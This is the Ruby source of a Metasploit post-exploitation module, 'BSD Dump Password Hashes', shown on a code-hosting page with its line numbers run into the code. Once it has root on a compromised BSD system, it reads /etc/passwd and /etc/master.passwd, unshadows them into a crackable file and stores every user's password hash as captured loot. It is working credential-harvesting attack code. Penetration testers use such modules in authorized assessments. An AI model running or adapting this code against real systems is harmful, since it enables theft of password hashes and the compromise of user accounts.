Path: blob/master/modules/post/bsd/gather/hashdump.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::Priv8include Msf::Auxiliary::Report910def initialize(info = {})11super(12update_info(13info,14'Name' => 'BSD Dump Password Hashes',15'Description' => %q{Post module to dump the password hashes for all users on a BSD system.},16'License' => MSF_LICENSE,17'Author' => ['bcoles'],18'Platform' => ['bsd'],19'SessionTypes' => ['shell', 'meterpreter'],20'Notes' => {21'Stability' => [CRASH_SAFE],22'SideEffects' => [],23'Reliability' => []24}25)26)27end2829def run30unless is_root?31fail_with(Failure::NoAccess, 'You must run this module as root!')32end3334passwd = read_file('/etc/passwd').to_s35unless passwd.blank?36p = store_loot('passwd', 'text/plain', session, passwd, 'passwd', 'BSD passwd file')37vprint_good("passwd saved in: #{p}")38end3940master_passwd = read_file('/etc/master.passwd').to_s41unless master_passwd.blank?42p = store_loot('master.passwd', 'text/plain', session, master_passwd, 'master.passwd', 'BSD master.passwd file')43vprint_good("master.passwd saved in: #{p}")44end4546# Unshadow passswords47john_file = unshadow(passwd, master_passwd)48return if john_file == ''4950john_file.each_line do |l|51hash_parts = l.split(':')52jtr_format = Metasploit::Framework::Hashes.identify_hash hash_parts[1]5354if jtr_format.empty? # overide the default55jtr_format = 'des,bsdi,sha512,crypt'56end5758credential_data = {59jtr_format: jtr_format,60origin_type: :session,61post_reference_name: refname,62private_type: :nonreplayable_hash,63private_data: hash_parts[1],64session_id: session_db_id,65username: hash_parts[0],66workspace_id: myworkspace_id67}6869create_credential(credential_data)70print_good(l.chomp)71end7273p = store_loot('bsd.hashes', 'text/plain', session, john_file, 'unshadowed.passwd', 'BSD Unshadowed Password File')74print_good("Unshadowed Password File: #{p}")75end7677def unshadow(pf, sf)78unshadowed = ''7980sf.each_line do |sl|81pass = sl.scan(/^\w*:([^:]*)/).join8283next if pass == '*'84next if pass == '!'8586user = sl.scan(/(^\w*):/).join87pf.each_line do |pl|88next unless pl.match(/^#{user}:/)8990unshadowed << pl.gsub(/:\*:/, ":#{pass}:")91end92end9394unshadowed95end96end979899